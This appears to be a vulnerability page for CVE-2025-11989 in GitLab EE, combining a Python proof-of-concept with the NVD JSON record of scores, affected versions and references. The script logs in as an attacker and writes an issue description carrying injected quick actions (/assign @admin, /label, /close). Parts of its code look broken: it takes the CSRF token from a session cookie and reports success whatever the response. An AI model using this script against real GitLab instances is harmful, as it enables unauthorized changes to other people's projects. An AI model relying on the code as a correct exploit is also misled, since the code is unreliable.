CVE-2025-11989

# CVE-2025-11989 PoC - GitLab EE Unauthorized Quick Actions Execution # This PoC demonstrates how an authenticated attacker can inject malicious quick actions import requests import json # Configuration GITLAB_URL = "https://gitlab.example.com" USERNAME = "attacker" PASSWORD = "password" TARGET_PROJECT_ID = "project_id" TARGET_ISSUE_IID = "123" # Authentication session = requests.Session() login_url = f"{GITLAB_URL}/users/sign_in" response = session.get(login_url) # Extract CSRF token csrf_token = response.cookies.get('_gitlab_session') # Login login_data = { 'user[login]': USERNAME, 'user[password]': PASSWORD, 'authenticity_token': csrf_token } session.post(login_url, data=login_data) # PoC: Inject malicious quick actions in issue description # The attacker includes unauthorized quick action commands malicious_description = """ Description with legitimate content. /assign @admin /label ~"Admin Access" /milestone "Secret Milestone" /close """ # Update issue with malicious description issue_url = f"{GITLAB_URL}/api/v4/projects/{TARGET_PROJECT_ID}/issues/{TARGET_ISSUE_IID}" update_data = { 'description': malicious_description, 'access_token': session.cookies.get('access_token') } response = session.put(issue_url, json=update_data) print("Malicious quick actions injected successfully") print("When an admin views this issue, the commands will be executed") print(f"Response: {response.status_code}")

{"cve": {"id": "CVE-2025-11989", "sourceIdentifier": "[email protected]", "published": "2025-10-27T00:15:40.927", "lastModified": "2025-10-28T13:38:41.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 17.6.0 before 18.3.5, 18.4 before 18.4.3, and 18.5 before 18.5.1 that could have allowed an authenticated attacker to execute unauthorized quick actions by including malicious commands in specific descriptions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.5", "matchCriteriaId": "090E4997-CCB2-48AC-9796-56FBE599958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.3", "matchCriteriaId": "425AEB81-EA04-4702-99F8-B623614F6901"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.5.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "CCF08EA3-6D3E-4388-BA9D-A992B771998F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/10/22/patch-release-gitlab-18-5-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/security/gitlab/-/issues/1426", "source": "[email protected]", "tags": ["Permissions Required"]}]}}